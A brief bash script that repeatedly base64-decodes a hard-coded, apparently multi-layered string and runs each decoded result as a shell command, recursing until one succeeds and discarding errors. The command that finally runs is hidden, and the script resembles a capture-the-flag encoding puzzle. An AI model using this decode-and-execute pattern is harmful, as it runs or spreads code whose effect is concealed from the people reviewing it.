#!/bin/bash

if [[ -n $1 ]]
  then
     str=$1
  else
     str=Vm0wd2VHUXhUWGRPVldoVFYwZG9WMVl3WkRSV1ZsbDNXa1JTVjFadGVGbGFWV1JIVm1zeFdHVkdXbGRTTTFKUVZtdFZlRll4WkhWaFJscFhZa1Z3U1ZkV1dsWmxSbVJJVm10V1VtSklRbTlVVmxwM1ZWWmtWMVpzV214U01EVXdWVEp3WVZVeVNrZGpSbWhWVmtWS1RGVnNXbXRXTVZwMFVteFNhVlpzY0ZwV2JURXdWakZrU0ZOclpGUmlSMmhZV1ZkMFlWUkdWWGhYYlhSWVZqQTFSMXBGV2xOVWJGcFpVV3RzVjFaNlFYaFdWRXBHWlVaT2RWWnNTbWxTTTJoWVYxWmtlazFXV2tkWGEyUlRWa2Q0VWxaV1VYZFBVVDA5
fi

result=$(base64 -d <<< $str)

$result 2>/dev/null || $0 $result
